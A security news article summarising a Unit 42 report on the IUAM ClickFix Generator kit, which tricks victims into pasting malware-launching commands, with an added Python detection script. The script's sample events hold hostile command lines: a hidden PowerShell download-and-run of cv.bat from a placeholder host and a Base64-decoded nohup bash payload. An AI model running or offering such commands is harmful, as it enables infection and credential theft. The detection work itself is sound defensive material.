Researchers from Palo Alto Networks Unit 42 have discovered a new phishing trend where attackers trick victims into manually executing malware on their own devices.
The report exposes a commoditized phishing ecosystem built around an automated tool known as the IUAM ClickFix Generator. This tool makes it simple for threat actors of any skill level to create realistic phishing pages that mimic the browser verification challenges shown by legitimate services.
As Unit 42 writes, “Attackers are packaging a highly effective social engineering technique known as ClickFix into easy-to-use phishing kits, making it accessible to a wider range of threat actors. This technique tricks victims into bypassing security measures by manually executing malware, typically information stealers and remote access Trojans (RATs).”
The ClickFix method disguises malicious intent behind what appears to be a normal browser security check. Victims visiting a phishing page are asked to verify that they’re human — usually by clicking a button that appears to trigger a CAPTCHA or verification process.
Behind the scenes, the click copies a malicious command to the victim’s clipboard. A prompt then instructs them to open a terminal (PowerShell or macOS Terminal), paste the copied command, and execute it “to complete the verification.”
This transforms the user into an unwitting participant in their own infection.
Unit 42 found that attackers are now automating the creation of these pages using the IUAM ClickFix Generator, hosted on a server at IP address 38.242.212[.]5. The kit was observed active from July through October 2025, providing a web interface for building customized phishing campaigns.
The report explains: “This tool allows threat actors to create highly customizable phishing pages that mimic the challenge-response behavior of a browser verification page… The spoofed interface is designed to appear legitimate to victims, increasing the effectiveness of the lure.”
Threat actors can customize nearly every detail — from the title and message (“Just a moment…”) to the command copied to the clipboard and the instructions shown in the fake verification prompt. Advanced options even allow operating system detection, JavaScript obfuscation, and mobile blocking, ensuring victims are guided to desktop environments where the malicious code will execute properly.
Unit 42 researchers identified multiple campaigns built with or inspired by the IUAM ClickFix Generator, each targeting different platforms and distributing distinct malware strains.
Campaign 1: Windows-Only – Delivering DeerStealer

In one case, attackers focused exclusively on Windows systems. “When a victim interacts with the CAPTCHA element by clicking a checkbox to determine whether they are human,” Unit 42 explains, “this action triggers a background JavaScript to copy a malicious PowerShell command to their clipboard. Simultaneously, a popover appears, instructing them to open the Windows Run dialog (by pressing Win+R), paste the content from their clipboard and run the command.”
When executed, the command downloads a malicious batch script (cv.bat) that installs DeerStealer, malware that steals credentials and browser data.
The underlying simplicity is what makes ClickFix so effective — it bypasses traditional email filters and endpoint protections because the payload execution occurs manually by the victim, rather than automatically by code exploitation.
Campaign 2: Multi-Platform – Targeting macOS with Odyssey
Another series of phishing campaigns broadened the scope. In this case, attackers configured phishing pages to detect the victim’s operating system via JavaScript and deliver different payloads for Windows and macOS users.

Unit 42 noted, “Each version of the phishing page detects the victim’s operating system via JavaScript… and delivers a payload accordingly.”
For macOS users, the pages delivered Odyssey Infostealer, a malware-as-a-service (MaaS) strain known to steal browser data, cryptocurrency wallets, and system credentials. The malicious command was hidden in Base64-encoded form and executed silently using nohup bash, so that it kept running even after the terminal window was closed.
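A detection check for the two execution chains described above (the Win+R PowerShell launch in Campaign 1 and the Base64-decoded nohup bash launch in Campaign 2), as an added example that is not code from the report or from the kit. The process events are constructed here, and the field names (parent, image, cmdline) are assumed to come from an EDR or Sysmon-style process-creation feed.

```python
import re

# Constructed process-creation events, not samples from the report. The URL,
# Base64 text and paths are placeholders chosen to exercise the rules below.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr hxxp://example.invalid/cv.bat '
                '-OutFile $env:TEMP\\cv.bat; & $env:TEMP\\cv.bat"'},
    {"parent": "Terminal", "image": "bash",
     "cmdline": 'nohup bash -c "$(echo ZWNobyBjb25zdHJ1Y3RlZA== | base64 -D)" '
                '>/dev/null 2>&1 &'},
    {"parent": "cmd.exe", "image": "powershell.exe",          # benign admin use
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
    {"parent": "Terminal", "image": "bash",                    # benign dev use
     "cmdline": "bash ./build.sh"},
]

WINDOWS_SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
DOWNLOAD_RE = re.compile(
    r"\b(iwr|invoke-webrequest|curl|wget|downloadstring|downloadfile)\b", re.I)
# Campaign 2 pattern: a Base64 decode feeding (or fed by) "nohup bash".
MAC_B64_NOHUP_RE = re.compile(
    r"base64\s+(-[dD]|--decode).*nohup\s+bash|nohup\s+bash.*base64\s+(-[dD]|--decode)",
    re.I)


def clickfix_reasons(event):
    """Return the reasons one event matches the ClickFix chains in the report."""
    reasons = []
    parent, image, cmd = event["parent"].lower(), event["image"].lower(), event["cmdline"]
    # Campaign 1: a command pasted into the Win+R Run dialog is spawned by
    # explorer.exe; a shell launched that way which fetches and stages a .bat
    # matches the DeerStealer chain (cv.bat). Parent alone is too noisy.
    if parent == "explorer.exe" and image in WINDOWS_SHELLS:
        if DOWNLOAD_RE.search(cmd):
            reasons.append("explorer.exe-spawned shell with download cmdlet (Run-dialog launch)")
        if re.search(r"\.bat\b", cmd, re.I):
            reasons.append("batch script staged from the command line")
    # Campaign 2 (macOS): Base64-hidden command executed via nohup bash.
    if MAC_B64_NOHUP_RE.search(cmd):
        reasons.append("Base64-decoded payload executed via nohup bash")
    return reasons


def flag_clickfix(events):
    """Return (cmdline, reasons) for every event that matched at least one rule."""
    return [(e["cmdline"], r) for e in events if (r := clickfix_reasons(e))]
```

Both rules are starting points: the explorer.exe parent is the Run-dialog signal, and the download or .bat condition is what keeps ordinary PowerShell use out of the hit list.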
The targeted domains for these campaigns included deceptive names like tradingview.connect-app[.]us[.]com, cloudlare-lndex[.]com, and teamsonsoft[.]com — all designed to look like legitimate web infrastructure or trading platforms.
Unit 42 observed that “some pages contained leftover developer comments written in Russian,” further hinting at the kit’s likely Eastern European origins.
While Unit 42’s investigation focused on one primary kit, the researchers discovered numerous related variants in circulation, suggesting that the ClickFix model is rapidly proliferating across cybercrime marketplaces.